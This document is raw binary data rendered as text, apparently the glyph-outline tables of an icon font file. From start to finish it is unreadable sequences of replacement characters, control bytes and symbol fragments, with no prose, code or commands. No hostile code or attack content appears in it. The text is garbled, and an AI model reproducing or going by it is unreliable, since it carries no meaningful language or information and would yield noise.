	�@w��w�w�����  $64'&327/�a����^�����  ��!  ����^����a�a��J@%��%	6�5��/	64'&"2	"/64&"'&476227<���ij��6��j6��u%k%~8p�8}%%�%k%}8p�8~%<���<�ij4j��4����t%%~8�p8~%k%�%%}8�p8}%k���54&#!"3!26#!"&5463!2&��&&�&�w�@w��w�w�@�&&�&&:�@w��w�w����/#!"&=463!24&#!"3!26#!"&5463!2���@�^B��B^^B@B^��w��w��w@w��@@�2@B^^B��B^^���w��w@w���+#!"'&?63!#"'&762�(��@�	@�(@>@�%����%%��� ���!232"'&76;!"/&76 �
�($��>��(����
		��J ���&%�����$%64/&"'&"2#!"&5463!2�ff4�-�4ff4f�w�@w��w�w��f4f�-�f4����@w��w�w�����/#5#5'&76	764/&"%#!"&5463!2��48`���
#�� ����\�P\��w�@w��w�w���4`8�
��
#�@  ���`\P�\`�@w��w�w�����)4&#!"273276#!"&5463!2&� *���f4�
'�w�@w��w�w�`�&')���4f�*�@w��w�w�����%5	64'&"3276'7>332#!"&5463!2�`��'(wƒa8!
�,j.��(&�w�@w��w�w��`4`*�'?_`ze<��	bw4/�*��@w��w�w�����-.  6 $$ ���� �������(�r���^����a�a���O����(��������_�^����a�a�����
-"'&763!24&#!"3!26#!"&5463!2y��B��(�(�
�@

�
�w�@w��w�w�]#�@�##� �

�@
�@w��w�w�����
-#!"'&7624&#!"3!26#!"&5463!2y(��(@B@u
�@

�
�w�@w��w�w��###��@���

�@
�@w��w�w�����
-'&54764&#!"3!26#!"&5463!2@�@####���@��w�@w��w�w��B��(�(������@�@w��w�w����`%#"'#"&=46;&7#"&=46;632/.#"!2#!!2#!32>?6�#
!"'�?_

BCbCa�f\	+
~�2�	
��
	�}0�$

��
q
90r�
�

�pr%Dpu���?#!"&=46;#"&=46;54632'.#"!2#!!546;2��D
a__����	g	

*`-Uh1

��������

�߫�}
	$^L��
���
4��b+"&=.'&?676032654.'.5467546;2'.#"�ǟ�
B{PDg	q�%%Q{%P46'-N/B).ĝ
�9kC<Q
7>W*_x*%K./58`7E%_���
�	,-3�
cVO2")#,)9;J)���
�"!*�
#VD,'#/&>AX��>++"''&=46;267!"&=463!&+"&=463!2+32��Ԫ�$
�	��	
p���U�9ӑ
@�/�*f�����o�	

VRfq
�f=S��E!#"&5!"&=463!5!"&=46;&76;2>76;232#!!2#![�
��

 ��

��
�
�%
)��
	���

��"

��Jg
Uh
B�W&WX���
hU
g��
�84&#!!2#!!2#!+"&=#"&=46;5#"&=46;463!2�j��@jo�����
������g�|�@��~�v����v�
u�n#467!!3'##467!++"'#+"&'#"&=46;'#"&=46;&76;2!6;2!6;232+32Q�Kt#�� ��#F�N�Qo!��"�դ��ѧ����!�mY

�Zga~bm]�

[o�"�U+��������,����� @��h��
h@�@X
��h��h
��@�8���3H\#5"'#"&+73273&#&+5275363534."#22>4.#2>��ut
3NtR�P*�H�o2

Lo�@!�R(�Ozh=�,G<X2O:&D1A.1G$<2I+A;"B,;&$��L��GlF/�����3�D�����;a��$8$��".�!3!
��.�3!#!"&5463!���8( 8(��(88( ��h (8��(88(@(8�(8H!!#!"&5463!54&#!"3!2654&#!"3!2654&#!"3!26��(D 8(��(88( 8��@��@��@�$����(88(@(8��(8� @@@@@@"�}
$BR3/&5##"'&76;46;232!56?5"#+#5!76;5!53'#3!533��H��
��

�����D��q		�x7��	���K/�/K��F��h�/"���		@`����Z		s�Y��w�jj��jj��j"�}
$4R%3/&5##"'&76;46;232!53'#3!533!56?5"#+#5!76;5��H��
��

��������K/�/K��F����q		�x7��	�h�/"���		@`����jj��jj��j�Z		s�Y��
w"�)9IY%#"'&76;46;232#!"&=463!2#!"&=463!2#!"&=463!2#!"&=463!2�
��

����� ��@������@���`��		@`�����������"�)9IY#!"&=463!2%#"'&76;46;232#!"&=463!2#!"&=463!2#!"&=463!2��� 
��

�������@��������@ ��r��		@`��r������"��
$CV%4&#"326#"'&76;46;232%#"'&'73267##"&54632!5346=#'73BX;4>ID2F��
��

������8PuE>.'%&TeQ,j��m{��+�>R�{�?jJrL6V��		@`��7>wmR1q
uW�ei��/rr�
:V��r"��
$7V4&#"326#"'&76;46;232!5346=#'73#"'&'73267##"&54632BX;4>ID2F��
��

������+�>R�{�8PuE>.'%&TeQ,j��m{��?jJrL6����		@`���rr�
:V��r3>wmR1q
uW�ei����@�\%4&#"326#!"&5463!2+".'&'.5467>767>7>7632!2&%%&�&��&& &�7.'	:@�$LB�WM{#&$h1D!		.I/!	Nr�&&%%��&&�&&V?, L=8=9%pEL+%�%r@W!<%*',<2(<&L,"r�@\#"&546324&#!"3!26%#!#"'.'.'&'.'.546767>;&%%&�&��&& &i7qN��	!/I.		!D1h$&#{MW�BL$�@:	'.�&&%%���&&��&&�=XNr%(M&<(2<,'*%<!W@r%�%+LEp%9=8=L ���	+=\d����%54#"327354"%###5#5#"'&53327#"'#3632#"'&=4762#3274645"=424'.'&!  7>76#'#3%54'&#"32763##"'&5#327#!"&5463!2��BB��PJN�C'%!	B?)#!CC $)�54f�"��@@
B+����,A

A+�&�+A
�
ZK35N #J!1331�CCC $)��w�@w��w�w��2��"33�F�Y�F~��(-%"��o�4*)$�(*�	(&;�;&&9LA38�33�4��S,;;,W��T+<<+T;(��\g7�x�:&&:�:&&<r����%-�@w��w�w����	+=[c}���#"'632#542%35!33!3##"'&5#327%54'&#"5#353276%5##"=354'&#"32767654"2 '.'&547>76 3#&'&'3#"'&=47632%#5#"'&53327�''RZZ�:k��id YYY.06�	62+YY-06	R[!.�'CD''EH$��VV�X:���:Y
X;��:Y
�fyd/%jG�&DC&&CD&O[52.
[$�C-D..D�^^���* l�y1%=^�I86�i077S
3
$EWgO%33%O�O%35	��EE�F�W�t;PP;p��t;PP;p�q��J�gT��F�Q%33&P�P%33%R�
7>%3���!+}��{�'+"&72'&76;2+"'66;2U
�&�
��	�(���P

�*��'�e�J."�-d�Z��-n �-���'74'&+";27&+";276'56#!"&5463!2�~�}�		�7��e �	���۩w�@w��w�w��"���
$Q#�'�!#
����@w��w�w��
�I-22#!&$/.'.'.'=&7>?>36����9II ! '	$ !�����01$$%A'	$ ! ����g	
\7@�)(���7Y
	
 \7@�)(���7Y
@����	'5557	���,���VW�QV���.R���W��=���?��l��%l`��������~����0��!#!#%777	5!	������R!!�XC�C��fff�݀�#�� `��,��������{��{{�`��������Og4&"2 &6 $"&462$"&62>7>7>&46.'.'. '.'&7>76 �Ԗ�� ���HR6L66L�G�HyU2LL2UyH��HyU2LL2UyHn
��X�6X��

��X�X��
Ԗ�Ԗ�����H�6L66L6�L2UyH��HyU2LL2UyH��HyU2L�n�6X��

��X�X��

�����2#!"&54634&"2$4&"2�w��w�@w��w�|�||��|�||���w�@w��w�w����||�||�||�|���	!3	37! $$ �n6^�5�5^h
����^����a�a������M�1�^����a�a���P��
*Cg'.676.7>.'$7>&'.'&'? 7%&'.'.'>767$/u5'&$I7o�b?K�\[z�H,1���+.@\7<��?5\V
,$V��g.GR@ �7��U,+!�����
	#	"8$}�{)�<�?L RR;kr,yE[��z#	/1
"#	#�eCI0/"5#`�	��"8���4~&p)4	2�{�H-.%W.L>���':Yi4&67&'&676'.'>7646&' '7>6'&'&7>7#!"&5463!2PR$++'TJX�j7-F��C',��,&C
."��!$28��h�/���"�	+p��^&+3$
i��0(�w�@w��w�w��+.i6=Bn\C1XR:#"�'jj�8Q.cAj�57!?"0D��$4"P[
&2�@w��w�w��D��"%.5#5>7>;!!76�P�Yh�pN!�HrD0�M��
 C0N��#>8\xx: �W]oW-�X���45���/%'#.5!5!#"37>#!"&5463!2p>,;$4
��5eD�+W�cE���w�@w��w�w�K�()��F
,VhV��^9tjA0/�@w��w�w���@�#"'&76;46;23�
��


��
	���&��

��� ���++"&5#"&7632�	���
^


c
� �&�

��@�#!'&5476!2� &��

����
^


b	���'&=!"&=463!546�
��� �&�
�
��	���
��
��q&8#"'&#"#"5476323276326767q'T��1[VA=QQ3���qq�Hih"-bfGw^44O#A���?66%CKJ�A}}�  !"�䒐""A$@C3^q|�z=KK?6�lk)���%!%!��V��V��u��u�u^-�m5�w��}�n�����~7M[264&"264&"2"&546+"&=##"&5'#"&5!467'&766276#"&54632�  �  ��*<;V<<O@-K<V<�<+*<J.@�k��c�lG
H_�_H
�<+*<<*+<    �<*�R+<<+�*<�f.@�+<<+��+<<+�@.��7�uu�7�
�**�
���R+<<+�+;;	��"%3I�#5472&6&67><&4'>&4.'.'.'.'.'&6&'.'.6767645.'#.'6&'&7676"&'&627>76'&7>'&'&'&'&766'.7>7676>76&6763>6&'&232.'.6'4."7674.'&#>7626'.'&#"'.'.'&676.67>7>5'&7>.'&'&'&7>7>767&'&67636'.'&67>7>.'.67�	\
��
	U7	
J#!W!'	

"';%

k	)"	
	'


/7* 		I	,6
*&"!

O6*
O $.(�	*.'

.x�,	$CN��	
�		*	�
6
		
7%&&_f&
",VL,G$3�@@$+
"


V5 3"	
""�#dA++
y0D-%&n4P'A5j$9E#"c7Y
6"	&
8Z(;=I50' !!e
�R
��
"+0n?�t(-z.'<>R$A"24B@(	~	9B9,	*$		
		<>	?0D�9f?Ae �	.(;1.D	4H&.Ct iY% *	�
7��


��
J	 <
W0%$	
""I!
*D	 ,4A'�4J"	.0f6D�4p�Z{+*�D_wqi;�W1G("%%T7F}AG!1#% JG3��� '.2>Vb%&#'32&'!>?>'&' &>"6&#">&'>26 $$ *b6�~�#��= ���XP2��{&%gx|�� .���W)o���O��LO�sEzG<��	CK}E	$MFD<5+
z���^����a�a$�MW�M��1>]|�YY�^D
�եA��<��K�m����E6<�"�@9I5*�^����a�a�����>^4./.543232654.#"#".#"32>#"'#"$&547&54632632�':XM1h*�+D($,/9p�`D�oC&JV<�Z PA3Q1*223�I�oBkែhMI����oPែhMI��oP�2S6,M!"@-7Y.?oI=[<%$('3 -- <-\�%Fu���Po��IMh���Po����IMh,���#?D76&#!"7>;267676&#!"&=463!267
#!"'&5463!26�%�8#!�
��&&Z"�M>2!��
	�^I7LRx_@�>MN�""��`�=&&*%�I�}��,
	�	L�7_jj��9����/%4&#!"3!264&#!"3!26#!"&5463!2�� ��� ��&��&&�&��������&&�&&��19#"'#++"&5#"&5475##"&54763!2"&4628(3�-�	&�B.�.B�&	�-�3(8Ig�gI�`������(8+U��e&��.BB.&����+8(�kk��`�������%-"&5#"&5#"&5#"&5463!2"&4628P8@B\B@B\B@8P8pP�Pp�����@�`(88(`�p.BB.�0.BB.���(88(�Pppͺ�������!%>&'&#"'.$ $$ ^/(V=$<;$=V).X���^����a�a��J`"(("`J��^����a�a��,���I4."2>%'%"/'&5%&'&?'&767%476762%6�[���՛[[���՛o��
�ܴ
 
���
��	��	$
$�	"	�$
$	��	�՛[[���՛[[�5`��

^�

�^

2`��
`2

^��^

��`
�����1%#"$54732$%#"$&546$763276�68��ʴh�f�킐&^�����zs��,!V[���vn)�	�6���<��ׂ�f{���z����}))N�s���3(@����+4&#!"3!2#!"&5463!2#!"&5463!2@&�&&f&��&&�&@&�&&&�4&&4&�@&&�&&��&&&& ��`�BH+"/##"./#"'.?&5#"&46;'&462!76232!46 `&�C�6�@Bb0�3eI;��:�&&�&4�L�4&���F���
�Z4&�w�4�) ���''
�5�r�&4&&�4&��&4��������}G�#&/.#./.'&4?63%27>'./&'&7676>767>?>%6}�)(."�2*&�@P9A
#sG�q]
#lh�<*46+(
	
<
5�R5"*>%</
 '2�@� 53*9*,�Z&VE/#E+)AC
(���	2k<X1$:hI(B
"	!:4Y&>"/	+[>hy
	���K
!/Ui%6&'&676&'&6'.7>%.$76$% $.5476$6?62'.76&&'&676%.76&'..676�#"NDQt	
�-�okQ//�jo_	������	���%&J�������Ղ���YJA-��.--
9\DtT+X?*<UW3'	26$>>�W0{�"F!"E �

^f`$"�_]\�<`�F�`�F�D��h>Cw�ls���J@�;=?s
:i_^{8+?`
)
O`�s2R�DE58/K��r	#"'>7&4$&5m��ī��"#���̵�$5���$�"^^W����=���ac��E�*���c������zk./"&4636$7.'>67.'>65.67>&/>z X^hc^O<q����+f$H^XbVS!rȇr?5GD_RV@-FbV=3!G84&3Im<$/6X_�D'=NUTL;2KPwt��Pt= 

�&ռ
,J~S/#NL,��8JsF);??1zIEJpq�DIPZXSF6\?5:NR=��;.&1��+!"&=!!%!5463!2�sQ9����Qs�*�*�*sQNQsBUw��
wUBF��H���CCTww���%1#"&=!"&=463!54632.  6 $$ �	��	
��

`?��������(�r���^����a�a�	��	
�
�
�
���(��������_�^����a�a�����%1#!#"'&47632!2.  6 $$ �
����		@	
`
��������(�r���^����a�a�
�
?		@	
���(��������_�^����a�a�����/#"'&476324&#!"3!26#!"&5463!2&�@�&
�@

�
�w�@w��w�w����&@B@&���

�@
�@w��w�w�����"&462  >& $$ �Ԗ��*�����(���r���^����a�a�Ԗ�Ԗ �������(���^����a�a���]�6#"$54732>%#"'!"&'&7>32'!!!2�f:�л����Ѫz��~�u:�
(�(%`V6B^hD%��i�(�]̳ޛ	��*>�6߅�����r�#�!3?^BEa�߀�#�9���#36'&632#"'&'&63232#!"&5463!2
��Q,&U�#+'
 �;il4L92<D`����w�@w��w�w�����`9ܩ6ɽ]`C4�7�7�&�@w��w�w����D+"&5#"'&=4?5#"'&=4?546;2%6%66546;2�������
	
��
	
��w�ww�w�������cB
�G]B
�G��t�y]t�y�
���#3C#!+"&5!"&=463!46;2!24&#!"3!26#!"&5463!2���@��`@`�^B��B^^B@B^��w��w��w@w��@��`@`���2@B^^B��B^^���w��w@w�����'/?P+5#"&547.467&546;532!764'!"+32#323!&ln��@
:MM:
@��nY*�Yz--zY�*55QDD�U���9p��Y-`]��]`.X /2I$�	t�@@/!!/@@3,$,3�$p$0�0��&*0��&���&��
!P@���RV2#"&/#"&/#"&546?#"&546?'&54632%'&54632763276%�>S]�8T;/M7��7T</L7�=Q7,�i�<R7,�5T</L666U;/M5�<U<,�i���6i���Q=a!;�;V6-�j�;V6-�5	P=/L596Q</L5�<U6-�i�;V7,�7O;-I6��8��i;k���)I2#!"&5463#9"'.'.'3!264&#!"2>7%>�w��w�@w��w�!"�5bBBb/�/*
8(@(87)��(8=%/�'#?��w�@w��w�w����#~$EE y &�L(88e):8(%O r		

		�O�?GQaq47&67>&&'&67>&"&#6$32#"#"'654  $&6 $6&$ Co��L��.*�KPx���.*� 
iSƓi
7J?��~�pi{_Я�;��lL�������UZ=刈�����刈�����_t'<Z
�:!
	���@!
��j`Q7$k�y, R����f��k*4�������LlL��=Z=刈��������&$&546$7%7&'5>�����]���5��%��w�����������&��P�?�zrSF�!|��&0	##!"&5#5!3!3!3!32!546;2!5463���)�
)����;)��);;)��)���&&������&@@&�&��&��	�
6 $&727"'%+"'&7&54767%&4762������֬>4P���t+8?::
	�	
::AW��``���EvEEvE<�.���"�e$IE&�O�&EI&�{h.`��m���"&#"&'327>73271[
>+)@
(���]:2,C?��*%�Zx/658:@#N
�C�=�E�(�o��E=��W'c:������#!#"$&6$3 &#"32>7!����ڝ���yy��,��{��ۀ�ہW�^F!�L�C=���y�:�y��w���߂0H\R%�"N^ '&76232762$"&5462"&46274&"&'264&#"'&&#"32$54'>$ $&6$ G>��>0yx1��4J55J�5J44J5�Fd$��?�4J55%6�E��#42F%��$f�������LlL�q>>11�J44%&4Z%44J54R1F$Z-%45J521��Z%F1#:��ʎ 9�������LlL�����#Qa"'&7622762%"&5462"&546274&#"&'73264&#"'&&#"32654'>#!"&5463!2�

5�5

*�*��.>.-@-R.>.-@-�<+*q�6�- -- 0�<�o,+< ��3�w�@w��w�w��

55

**�.. -- .. --G*<N�' ,-@-+*��M <*2
z��z
1�@w��w�w�����0<754&""&=#326546325##"&='26 $$ bZt�t&�sRQs��Z<t�sQ���^����a�a�>OpoO��xzRrqP6�z~{{Prr��^����a�a�����]054&"#"&5!2654632!#"&57265&<T<����H<T<������H������<T<8v*<<*������
��+;;+l���:�������=:��*;;*���
%!!"!!26#!"&5463!2��@� ]���]�@�w�@w��w�w�����]� �@��@w��w�w���	
%)3!!#335!!5!5!%#!!5!5!%#H��H{����R��H��H{���G��G{�)���q���G����R�R�q���R�R�q�����	#0@#"'632#"'632&#"7532&#"#7532#!"&5463!2L5+*5��L5+*5~�}7W|�3B}��}JC��7=}�w�@w��w�w�D�ZQ�[�1�N:_��)�i�$��)���@w��w�w��
)�	�����������6.#&#"'&547>'&#".'&'#"&5467%&4>7>3263232654.547'654'63277.'.*#">7?67>?>32#"'7'>3'>3235?�K�cgA+![<E0y�$,<'.cI
	,#� '!;7$�=ep���	��/�/7/
D+R>,7*
2(-#=
	/~[(D?G  �|,)"#+)O��8,+�'�6	y{=@��0mI�#938OA�E`
-�
)y_/FwaH8j7=7?%����a	%%!?)L
J
9=5]~�pj

 %(��1$",I 
$@((�
+!.S		-L__$'-9L	5V��+	
	6�T+6.8-$�0��+
t�|S1��6]�&#"'&#"67>76'&'&#"67>32764.#"#.32>67>7 $&54>7>7>7�rJ�@"kb2)W+,5/1		#

Z
-!��$IOXp7s�LCF9�vz NAG#/ 5|����Հ';RKR/J#=$,�9,�+$UCS7'2"1
 !�/
,

/--ST(::(�ep4AM@=I>".)x��ls��Y�|qK@
%(YQ�&N
EHv~����<Zx'#"&5467&6?2?'&"/.7.546326#"&'&/7264/7'764&"'?>>32.��A�UpIUxYE.A�%%%h%����%hJ%�����D,FZxULsT�gxUJrV�D�%hJ%�����@/LefL.C�%Jh%�����C�VsNUxϠ�@.FZyUHpV�A�%h&%%���%Ji%�����C�WpIUybJ/��Uy^G,D�%Jh%�����@�UsMtU�C�%hJ%�����C-Kfy�EX[_gj��&/&'.''67>7>7&'&'&'>76763>7>#&'&'767672'%'7'+"&'&546323267>7%#"'4'6767672,32�,+DCCQL�Df'
%:/d
B	4@}
�&!0$�?�����J�f�d�f-�.=���6(��:!TO�?
!I�G_�U%
����.
k*.=;�	5gN_X��	"
##
292Q41�
��*����6���nA;�|�
�BSN.	%1$����
6	$��nk�^�'7GWgw�����2+"&5463#!"&5463!254&+";2654&+";2654&+";2654&+";2654&+";2654&+";2654&+";2654&+";2654&+";26#"&=! B^^B�B^^B�:F�j��B^8(�(`�(� ������������������`�(8���^B��B^^B@B^�"vE�j�^B(8(�`(�����������������������8(����/?O_o��������/?2#!"&5463;26=4&+";26=4&+";26=4&+";26=4&+"54&+";2654&+";2654&+";2654&+";2654&+";2654&#!"3!2654&+";2654&+";2654&+";2654&+";2654&+";2654&+";2654&+";2654&+";2654&+";26@&&�&&�@@@@@@@@�@@@@@@@@@@��@@@@@@@@@@@@@@@@@@@&��&&�&��@@��@@��@@��@@��@@@@@@@@@@���@@@@@@@@�@@@@@@@@@@@��`'	"&5#"&5&4762!762$"&462���B\B@B\B��O�p�P����������.BB.���.BB.8$P��O広�������3CQ#".54>32#".546322#"&#"#"54>%".54>32%2#"&54>&X=L|<&X=M{<��TML�FTML�F�v�"?B+D�?B�J�p��H=X&<{M=X&<|dMTF�LMTF�(<kNs�I<kNs���Pvo�JPwo�/��s.=ZY�VӮv�Nk<J�sNk<I�shwPJ�ovPJ�o@��+"&7.54>2�r_-$�$-_rU���U��%��&&5%ő������'-
"'.546762����@��F�F�$�@B�@$.&�,�&.]]|�q����#<���<#(B�B��B%'-%'-'%'-"'%&'"'%.5467%467%62����@��l�l����@��l�l,���@��G�G�&!�@@�@�@@�@!&+#�+#�6�#+�$*`�:�p������:�p���x�
�p����=�`$>����>$�&@��&@�

�@&�p�@��	&.A!!"!&2673!"5432!%!254#!5!2654#!%!2#!8���Zp��?v�d���Ί�e�ns�6(���N[�����RW�u?�rt1Sr�F���|��iZ��@7�����މoy2���IM��C~[�R �yK{T:���%,AGK2#!"&5463!!2654'654.#532#532"&5!654&#"327#2#>!!�w��w�@w��w��~u��k'JTM��wa��|
DH��������>�I1q�Fj?����w�@w��w�w�����sq�*4p9O*�¸Z^���qh LE
�������"(nz8B
M���'?"&4624&#"'.'324&#"3267##"&/632632.�ʏ����hhMA�LR vGhг~��~������K„y���O^
��ʏ�ʏ��В*�LM@!<I�~��~����������t\��0�������CM4&"2#"&'676&/632#!"&=3267%2654&#"&#"%463!2"&4632�r�qq��tR8^4.<x3=RR��w�@w���_h�
Y��Ӗ���	K>�שw�w���ȍ�de�)�qrOPq�Ȧs:03=<x!m�@w��w�E\x�g�ӕ��є��%w�w����d��Ȏ��V��
-<K\%.'.>7'.?67'67%'>&%'7%7./6D�\$>	"N,��?a0�#O���1G�����9�'/���P(1#00��
($=!F"�9|��]�"RE<�6'o��9%8J$\:��\H�iTe<?}V��#�oj��?���d,6���%N#"
Hl��S��VY�]C

=�@�C4&"2!.#!"4&"2+"&=!"&=#"&546;>3!232�^�^^���Y	�	^�^^��`p�p�p�p`�]i�bb�i]�~�^^�^�e��^^�^���PppP��PppP��]��^^�]��3;EM2+"&=!"&=#"&546;>;5463!232264&"!.#!"264&" ]�`p�p�p�p`�]i�b���b�i���^^�^d�Y	�	!�^^�^��]��@PppP@@PppP@�]��^��^�]� ^�^^��e��^�^^� ��3$#!#!"&5467!"&47#"&47#"&4762++�&�2
$��$
�2&��&��&�4�&��&��Z4&�&##&�&4�&4�&4���4&�m4&�m���+DP4'&#"32763232674'&!"32763 3264'&$#"32763232> $$ g����* �o�`#�ə�0#z��#l(~���̠)���-g+����^����a�aF s"	+g�(�*
3#!|
#/IK/%*%D=)[�^����a�a����	!!!'!!77!���,���/���,�-���a��/G��	t%/;<HTbcq������%7.#"32%74'&"32765"/7627#"5'7432#"/7632#"5'7432#"&5'74632	#"/6327#"/6327#"/46329"&/462"&/>21"&/567632#!.547632632
	
	*


			��X		�

^

`		���

^b
	��c�
	f�u��
U`�59u���

���

4�J���
	
l�~		~�	F��	
��	�2�����

�
�	��	�m����|O�,��� ����	

���
��������

ru|	��u�
�
"�����
)9 $7 $&= $7 $&= $7 $&=  $&=46��w���`���w���w���`���w���w���`���w��b����`����VT�EvEEvE�T��VT�EvEEvE�T*VT�EvEEvE�T*EvE�EvEEvE�Ev�#^ct�#!"&5463!2!&'&!"&5!632#"&'#"/&'&7>766767.76;267674767&5&5&'67.'&'&#3274�(8(��(88(�(`�x
��c�`(8��!3;:�A0�?ݫ�Y

	^U	47D$

	7�4U3I�
|��L38wtL0�`(��(88(@(8(D��9�8(��Q1&(!;��
(g-	Up�~R�2(/{E���(Xz*Z%(�i6CmVo8�#T#!"&5463!2!&'&!"&5!3367653335!3#4.5.'##'&'35�(8(��(88(�(`�x
��c�`(8�iF������F��Zc�r�cZ�`(��(88(@(8(D��9�8(���k�k�"	��kk�J	 	!��	�k�#S#!"&5463!2!&'&!"&5!%!5#7>;#!5#35!3#&'&/35!3�(8(��(88(�(`�x
��c�`(8�-Kg
kL#D��C��JgjL��D���`(��(88(@(8(D��9�8(���jj�	�jjkk��kk����#8C#!"&5463!2!&'&!"&5!%!5#5327>54&'&#!3#32�(8(��(88(�(`�x
��c�`(8� G]�L*COJ?0R��\wx48>�`(��(88(@(8(D��9�8(���jj��RQxk��!RY�#*2#!"&5463!2!&'&!"&5!!57"&462�(8(��(88(�(`�x
��c�`(8�������P�pp�p�`(��(88(@(8(D��9�8(����������p�pp�	�#*7JR5#5#5#5##!"&5463!2!&'&!"&5##5!"&54765332264&"�����<(8(��(88(�(`�x
��c�`(8����k�ޑc�O"�jKKjK�������������`(��(88(@(8(D��9�8(������SmmS?M���&4&&4�#9L^#!"&5463!2!&'&!"&5!#"/#"&=46;76276'.'2764'.�(8(��(88(�(`�x
��c�`(8���������6dd�WW6&44�`(��(88(@(8(D��9�8(��.��	����G���5{��{5�]�]$59�95�#3C#!"&5463!2!&'&!"&5!2#!"&5463#"'5632�(8(��(88(�(`�x
��c�`(8��4LL4��4LL4l	��		�`(��(88(@(8(D��9�8(���L4��4LL4�4L��	
Z
	�#7K[#!"&5463!2!&'&!"&5!>&'&7!/.?'&6?6.7>'�(8(��(88(�(`�x
��c�`(8�`3��3��3��3�v
�
?
�
�`(��(88(@(8(D��9�8(���&��&-��&��&�
?


��
'���6#'.
'!67&54632".'654&#"32�eaAɢ/PRAids`WXyzO�v��д��:C;A:25@Ң>�����-05r��n������`��H(�����' gQWZc[���
-%7'	%'-'%	%"'&54762�[������3[��M���N�����
��3"��,��""3,3"o�ng�$������߆���]�g�n��$����+��)��

")")"

��x#W#"&#!+.5467&546326$32327.'#"&5463232654&#"632#".#"o���G��n\�u_MK'����̨|�g?CM7MM5,QAAIQqAy��{�b]BL4PJ9+OABIRo?z��.�z��
�n�6'+s�:�������z�cIAC65D*DRRD*�wy�al@B39E*DRRD*��'/7  $&6$ 6277&47' 7'"' 6& 6'�lL������������R�R����ZB|��R�R��>����d�ZZ��������LlL�Z����R�R«����Z��&�>���«|��R� � ��! $&54$7 >54'5��������P���f���f����P�����牉�@��s��-����ff���`-����c6721>?>././76&/7>?>?>./&31#"$&��(@8!IH2hM>'

)-*
h'N'��!'Og,R"/!YQG<I *1)

(-O1D+0�n�������z�3fw���G2'3�rd1!sF0o ��.q"!%GsH8��@-!5|w|pgS=
"B2PJfh�G���d�R	�(P]ly��&$'77&7567'676'"'7&'&'7&47'6767'627''6$'67'654'7&'7'&'&'7&'5&$  $6 $&6$ j��j:,A��A��S9bb9R#:j���8AܔA,z��C�9Z04\40Z9�C��!B�;X0,l,0X;�B�*A8ܔA&#9j`b9S$#R99#&A��8A�`
������䇇�<Z<䳎������LlL�fBϬ"129�,V<4!���!88dpm��"��BV,�92[P*V*P\M�C�

�C�M\P*V*P]L�D�

�D�L&BV*�8*8!����f�!4<gmpd88!&!8*8�*VB�Z<䇇�����䇇��������LlL�����9Eis�%#"5432#"543275#&#"3254&'.547>54'63&547#5#"=3235#47##6323#324&"26%#!"&5463!2F]kbf$JMM$&�N92<Vv;,&)q(DL+�`N11MZ
%G���&54	#	i�<$8&@��0H12F1d�w�@w��w�w��B?@�UTZ3%}rV2hD5%f-C#�C@,nO	�a7�.0�x2	yR�uR/u�%6;&�$76%$56S�@w��w�w��D��<Hlw%4#"324&#"32!".5475&5475.546322#654'3%#".535"&#"5354'33"&+32#"&54632S����;<;||w
$+�|('-GVVG-��EznA�C?H_��`Rb���]Gg>Z2&`��9UW=��N9:PO;:dhe\=R����
+)�&')-S9��9kJ�<)Um�Q��/��-Ya^"![��Y��'(<`X;_�L6#)|����tWW:;X���	#'#3#!"&5463!2)
p�*�xeשw�@w��w�w���0,\8�����@w��w�w��9��I#"'#"&'&>767&5462#"'.7>32>4."&'&54>32JrO<3>5�-&FD(=Gq���@C$39a��LL��²�L4

&)
@]��v�
�q#CO���!~󿵂<ZK#*Pq.���%
L��²�LL��arh({�w؜\���i&5467&6747632#".'&##".'&'.'#".5467>72765'./"#"&'&5
�}����1R<2"7MW'$	;IS7@�5sQ@@)�R#DvTA;
0x
I)�!:>�+<B76:NFcP:SC4r�l+r �E%.*a-(6%('�>)C	6.�>�
!-I[4&#"324&#"3264&#"324&#"326&#"#".'7$4$32'#"$&6$32D2)+BB+)3(--(3�1)+BB+)�4'--'4��'���#!0>R	�H���MŰ9�o�u7ǖD��䣣���
R23('3�_,--,�R23('3�_,--,�����NJ
������?u�W�m%������#"'%#"'.5	%&'&7632�!�
�;�
	`��u%"��(����!]#�c�)(�	��� #"'%#"'.5%&'&76	�!�
���	�(%#�#���fP_�"�(���!�)'��+�ʼn�����4I#"$'&6?6332>4.#"#!"&54766$32#!"&=46;46;2z�䜬��m�
I�wh��QQ��hb�F�*�@&('�k�������@����z��
�	
_hQ��н�QGB�'(&�*�eozΘ�@@`���  >. $$ ����ff���ff�����^����a�af���ff�����^����a�a��>�����"&#"#"&54>7654'&#!"#"&#"#"&54>765'46.'."&54632326323!27654'.5463232632�,�-,�,",:!
%�]&
%@2(/�.+�*)6!	<.$.�.*�*"+8#
�
#Q3,�,+�+#-:#"</$�)

w�

���
,*

x9-.2"'
,,
���@�&,,
��Qw
,����,#"+"&5#+"&5&'&'&547676)2�%2$l$�#l#�b~B@XXyo2�$CI@5��$$�>$$�/:yu��xv)%$	��/?CG%!5%2#!"&5463!5#5!52#!"&54632#!"&5463#5!5`���&&�&&������ �&&�&&�&&�&&@������&�&&&���������&�&&&�&�&&&��������%2 &547%#"&632%&546 #"'6���������\~����~\h�
���~\��h\�������V�
�V�������V��V���%5$4&#"'64'73264&"&#"3272#!"&5463!2}XT=��=TX}}�~�>SX}}XS>�~�}�w�@w��w�w���~:xx:~�}}Xx9}�}9xX}�@w��w�w���/>LXds.327>76 $&6$32762#"/&4762"/&47626+"&46;2'"&=462#"'&4?62E0l�,

*"�T�.�D@Yo������oo����@5D�

[		

Z
�Z

		[	 ``��[



Z

	�2
,�l0
(T�"�.�D5@������oo��oY@D,

Z

		[	�		[		

Z
��``EZ

		[		
�5%!  $&66='&'%77'727'%am��lL�������m�f�?���5���5>�f�F�tu�ut�F������������LlL�H�Y�C�L|��|L����Y�˄(��E''E*(�/?IYiy����%+"&=46;2+"&=46;2+"&=46;2+"&=46;2%"&=!#+"&=46;2+"&=46;2+"&=46;2+"&=46;2!54!54>$ +"&=46;2#!"&=������@�������&&������@��������������3P��
>��P3��&��&��r���r��r���&��&���r���r��r���
he

4LKM:%%:MKL4�W��T�&&��%/9##!"&563!!#!"&5"&5!2!5463!2!5463!2�&&�&��&�&&���� ��� ��&��&&i�@����&&@&7�����'#5&?6262�%%�o����;����j|/����&jJ%�p��&j;&i&�p���/|���j�ţ���%Jk%�o��%��	:g"&5462#"&546324&#!"263662>7'&75.''&'&&'&6463!276i���~ZYYZ~�@O��S;+[G[3YUD#o?D&G3I=J�y�TkBuhNV!WOhuAiS�y*'^C�C^'*SwwSTvvTSwwSTvv���WID\�_"[�g��q# /3qF��r2/ $r�g�%4
